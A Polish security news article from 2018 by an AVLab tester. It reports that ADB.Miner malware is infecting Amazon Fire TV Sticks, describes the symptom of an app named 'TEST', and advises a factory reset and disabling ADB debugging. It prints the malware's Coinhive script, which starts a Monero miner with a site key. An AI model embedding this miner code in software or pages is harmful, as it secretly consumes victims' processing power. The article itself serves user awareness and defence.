Amazon Fire TV Stick zainfekowany koparką kryptowaluty Monero

20 czerwca, 2018

Niezależnie od urządzenia, na którym jest zainstalowany Android, to ciągle ten sam stary zielony robot, który może zawierać różne nakładki graficznie wyglądem nieprzypominające oryginalny system. Pod względem bezpieczeństwa Android nie ma łatwego życia, a i tym razem autorzy malware wzięli na cel przystawki telewizyjne Amazon Fire TV Stick rozszerzające możliwości zwykłych telewizorów.

Amazon fire tv stick

Użytkownicy forum XDA zgłaszają problemy z wydajnością Amazon Fire TV, podejrzewając problemy z bezpieczeństwem. I nie mylą się, o czym świadczy kod zawarty w złośliwej aplikacji:

<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
        var miner = new CoinHive.Anonymous('eXnvyAQwXxGV80C4fGuiRiDZiDpDaSrf',{
        threads:3,
        throttle: 0.6
});
        miner.start();
</script>

Amazon Fire TV oraz Amazon Fire TV Stick są infekowane przez malware ADB.Miner, które instaluje się w systemie jako aplikacja „TEST”.

Malware monero Amazon Fire TV

Nie wiadomo gdzie dokładnie jest jej źródło, ale podejrzewa się nieoficjalne lub zcrackowane oprogramowanie do oglądania kanałów telewizyjnych. Dodatkowo ADB.Miner niczym robak komputerowy może rozprzestrzeniać się na inne urządzenia z systemem Android w tej samej sieci. Zadanie ma jednak utrudnione, ponieważ na atakowanym smartfonie lub Smart TV musi być włączona funkcja debugowania (Android Debug Bridge) — chociaż nie zawsze, ponieważ robak potrafi włączyć taki komunikat:

ADB Debugowanie

Jak rozpoznać infekcję Amazon Fire TV Stick?

Jeżeli na ekranie zobaczysz aplikację „Test Ready to launch!”, to Twoje urządzenie jest zainfekowane. Szkodliwe oprogramowanie będzie wykorzystywać do 100% czasu procesora, a więc wszystkie inne zadania realizowane przez system będą znacznie ograniczone wydajnościowo.

W celu całkowitego pozbycia się szkodnika zaleca się przywrócenie ustawień fabrycznych i ponowne sprawowanie urządzeń Amazon z telewizorem. Potem należy jeszcze wyłączyć funkcję debugowania. Dodatkowo rekomendujemy instalację mobilnego oprogramowania antywirusowego dla systemu Android. Warto też ograniczyć instalowanie aplikacji niewiadomego pochodzenia, ponieważ do końca nie można mieć pewności, jaki kod może mieć w sobie zaszyty.

Adrian Ścibor

Adrian Ścibor

W ramach działań związanych z cyberbezpieczeństwem odpowiada w AVLab za przeprowadzanie testów rozwiązań ochronnych przed zagrożeniami. Opracowuje strategie oraz narzędzia, które pomagają w ochronie danych i systemów przed cyberatakami. Współuczestnik międzynarodowej grupy non-profit AMTSO, która zrzesza ekspertów IT.
Adrian Ścibor

Adrian Ścibor

W ramach działań związanych z cyberbezpieczeństwem odpowiada w AVLab za przeprowadzanie testów rozwiązań ochronnych przed zagrożeniami. Opracowuje strategie oraz narzędzia, które pomagają w ochronie danych i systemów przed cyberatakami. Współuczestnik międzynarodowej grupy non-profit AMTSO, która zrzesza ekspertów IT.

PODZIEL SIĘ:

Czy ten artykuł był pomocny?

Średnia ocena: 0 / 5. Liczba głosów: 0

guest
0 komentarzy
Inline Feedbacks
View all comments

Wyrażam zgodę na przesłanie oferty drogą telefoniczną przez IT Partners security sp. z o.o. z siedzibą Katowicach ul.Padereskiego 35 na podany przeze mnie adres e-mail zgodnie z ustawą z dnia 10 maja 2018 roku o ochronie danych osobowych (Dz. Ustaw z 2018, poz. 1000) oraz zgodnie z Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (RODO).

Wyrażam zgodę na przesłanie oferty drogą mailową przez IT Partners security sp. z o.o. z siedzibą Katowicach ul.Padereskiego 35 na podany przeze mnie adres e-mail zgodnie z ustawą z dnia 10 maja 2018 roku o ochronie danych osobowych (Dz. Ustaw z 2018, poz. 1000) oraz zgodnie z Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (RODO).

[ninja_tables id=”27481″]